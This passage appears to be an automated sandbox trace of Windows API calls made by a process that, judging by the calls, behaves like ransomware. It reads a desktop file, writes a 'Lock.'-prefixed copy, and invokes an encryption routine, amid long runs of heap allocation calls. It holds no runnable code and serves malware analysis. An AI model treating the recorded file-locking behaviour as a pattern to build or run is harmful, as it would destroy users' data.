RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0186.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0186.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0186.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0186.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.749] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/kjGjReTolqh2VyQZXmn2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\kjgjretolqh2vyqzxmn2.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0186.749] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.749] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0186.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0186.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0186.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0186.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0186.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0186.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0186.750] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0186.750] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.kjGjReTolqh2VyQZXmn2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.kjgjretolqh2vyqzxmn2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0186.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0186.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0186.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0186.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0186.754] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0186.754] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0186.758] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x3925, lpOverlapped=0x0) returned 1 [0186.759] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0186.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0186.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0186.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0186.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x2f24018 [0186.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe52020 | out: hHeap=0x970000) returned 1 [0186.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0186.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0186.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0186.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0186.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0186.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0186.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0186.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x2f37948 [0186.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0186.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0186.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0186.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0186.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0186.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x2f24018 [0186.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0186.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0186.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0186.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0186.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0186.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0186.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0186.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0186.768] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0186.768] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0186.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0186.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0186.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x2f24018 [0186.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0186.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0186.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0186.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0186.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x3be0048 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0186.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0186.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0186.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0186.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0186.775] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0186.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0186.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 